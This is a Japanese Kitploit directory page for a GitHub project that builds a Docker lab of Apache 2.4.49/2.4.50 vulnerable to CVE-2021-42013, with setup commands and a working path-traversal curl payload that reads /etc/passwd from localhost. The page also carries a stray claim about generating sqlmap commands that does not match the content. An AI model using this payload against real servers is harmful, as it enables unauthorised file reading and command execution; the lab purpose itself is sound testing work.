Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2021-42013-httpd — CVE: 2021-42013 Tested on: 2.4.49 and 2.4.50 Description: Apache 2.4.49および2.4.50におけるパストラバーサルまたはリモートコード実行の脆弱性 | Kitploit
ツール/GitHubGitHub/cybfar/cve-2021-42013-httpd
コンテナセキュリティ脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育ラボと実践
GitHubcybfar/cve-2021-42013-httpd

cve-2021-42013-httpd

CVE: 2021-42013 Tested on: 2.4.49 and 2.4.50 Description: Apache 2.4.49および2.4.50におけるパストラバーサルまたはリモートコード実行の脆弱性

リポジトリを見る
113年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

脆弱性のDocker化:cve-2021-42013

このプロジェクトは、Dockerを使用して特定の脆弱性をDocker化することを目的としています。目的は、脆弱性が安全に悪用・テストできる隔離環境を作成することです。

脆弱なアプリケーション

Apache HTTP Server 2.4.50 - リモートコード実行 && パストラバーサル

インストール

このプロジェクトを実行するには、以下のソフトウェアがマシンにインストールされている必要があります:

  • Docker
  • Python
  • Curl

前提条件がインストールされたら、以下のようにこのGitリポジトリをクローンできます:

root@kitploit:~
  git clone https://github.com/cybfar/cve-2021-42013-httpd.git

  cd Ccve-2021-42013-httpd

リポジトリのディレクトリに移動したら、以下のコマンドを実行して脆弱な環境をセットアップします:

root@kitploit:~
  docker build -t apache-httpd-vuln .
  docker run -p 8000:80 apache-httpd-vuln

その後、http://localhost:8000 にアクセスしてください。 正常に動作していれば、「It works」と表示されるはずです。

脆弱性の悪用

以下のcurlを使用したペイロードの実行により、ターゲットが脆弱であることがわかります。このスクリプトは、脆弱性を悪用するための適切なsqlmapコマンドを生成します。

root@kitploit:~
  curl -v --path-as-is localhost:8000/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd

このペイロードは、ユーザーの同意なしにシステム内のユーザー情報に直接アクセスできます。

サーバー上でcgiまたはcgidモジュールを有効にすると、この脆弱性により攻撃者が任意のコマンドを実行できるようになります。

ツールをダウンロード